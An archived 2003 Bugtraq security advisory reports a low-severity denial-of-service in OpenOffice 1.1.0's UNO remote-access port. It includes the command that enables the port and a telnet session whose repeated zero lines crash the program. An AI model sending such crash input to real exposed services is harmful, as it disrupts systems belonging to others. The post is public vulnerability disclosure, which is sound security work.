lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.A41.4.44.0310081214410.64654-100000@zivunix.uni-muenster.de>
Date: Wed, 8 Oct 2003 13:15:10 +0200 (MES)
From: Marc Schoenefeld <schonef@...-muenster.de>
To: bugtraq@...urityfocus.com
Subject: Openoffice 1.1.0 DoS


================================
Illegalaccess.org Security Alert
================================

 Date        : 08/10/2003
 Application : Openoffice
 Version     : 1.1.0
 Website     : http://www.Openoffice.org
 Problems    : Desktop Denial-Of-Service
 Severity    : Low
 Contributor : Marc Schoenefeld, marc@....illegalaccess

When enabling remote access (UNO) to OpenOffice,
it opens a port (default 8100). This is done typically with
the following command:

C:\Programme\oo1.1.0\program> soffice
"-accept=socket,host=<ip>,port=8100;urp;"

where <ip> states the listening address

When issuing the commands listed below, Openoffice crashes and
prompts the error reporting box.

===================================================================
C:\Dokumente und Einstellungen\User>telnet 127.0.0.1 8100
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
0
0
0
0
0
0
0
0
0
0
0
0
===================================================================


--

Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ